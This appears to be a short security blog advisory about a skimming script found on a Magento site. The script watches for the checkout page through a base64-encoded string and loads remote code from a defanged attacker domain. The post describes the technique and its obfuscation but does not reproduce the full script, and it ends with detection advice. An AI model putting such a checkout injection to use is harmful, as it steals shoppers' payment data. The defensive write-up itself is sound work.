Our team recently came across a malicious script used on a Magento website titled gstaticapi, which targeted checkout processes to capture and exfiltrate stolen information.
As seen above, the first if statement looks for the checkout string in the URL using window.location.href.indexOf.
When decoded, the base64 string “Y2hlY2tvdXQ=” equates to “checkout”:
The code creates a script element, where script.src= has been set to another base64 string equal to gstaticapi[.]com/gs.js.
While the script consists of only five lines, it can be combined into a single line to make it more difficult to detect. And unless you know exactly which strings to look for, a search for any associated domains will be difficult since they are all encoded.
To detect these types of injections, your best bet is to leverage a website monitoring service that can detect changes on both externally and at the server level.